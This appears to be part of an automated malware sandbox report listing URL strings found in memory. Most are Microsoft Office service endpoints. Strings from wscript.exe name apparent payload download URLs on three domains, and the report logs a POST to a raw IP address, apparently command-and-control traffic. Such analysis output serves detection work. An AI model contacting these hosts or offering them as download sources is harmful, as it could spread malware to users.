                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dev.cortana.ai
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://devnull.onenote.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://directory.services.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.ppe.windows.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.ppe.windows.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.windows.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.windows.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://invites.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://lifecycle.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.microsoftonline.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows.local
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://make.powerautomate.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://management.azure.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://management.azure.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.action.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.engagement.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://microsoftapc-my.sharepoint.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ncus.contentsync.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ncus.pagecontentsync.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officeapps.live.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://onedrive.live.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://onedrive.live.com/embed?
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://otelrules.azureedge.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office365.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pages.store.office.com/review/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                    Source: wscript.exe, 00000001.00000003.387940812.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416607803.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410465872.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416558932.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/
                    Source: wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.00000000058E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399047863.0000000005863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410928876.0000000005389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409154486.0000000005B12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394230105.000000000578B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405910637.0000000005967000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400148476.00000000058CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405867233.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394601502.00000000057AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.415892369.0000000005968000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408129613.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393277198.00000000056D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416390329.0000000005B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393894273.0000000005771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393446805.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406352017.0000000005985000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406133706.0000000005968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
                    Source: wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409154486.0000000005B12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408939455.0000000005B0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416198169.0000000005B1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409946168.0000000005B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/s/
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
                    Source: wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409368396.0000000005B3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409588847.0000000005B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416274274.0000000005B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409409593.0000000005B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                    Source: wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
                    Source: wscript.exe, 00000001.00000003.408129613.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407753582.0000000005A74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408410878.0000000005AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406833763.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406423149.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407871524.0000000005A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408716059.0000000005AD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407092304.0000000005A5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407538773.0000000005A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/am
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://powerlift.acompli.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pushchannel.1drv.ms
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://settings.outlook.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://shell.suite.office.com:1443
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://staging.cortana.ai
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://store.office.de/addinstemplate
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://tasks.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://webshell.suite.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://wus2.contentsync.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://wus2.pagecontentsync.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                    Source: wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
                    Source: wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.00000000058FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398244951.00000000058E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397885905.00000000058CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408804171.00000000058FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.415808648.00000000058FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/EC24
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://www.odwebp.svc.ms
                    Source: unknownHTTP traffic detected: POST /xqnhpb/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
                    Source: unknownDNS traffic detected: queries for: penshorn.org
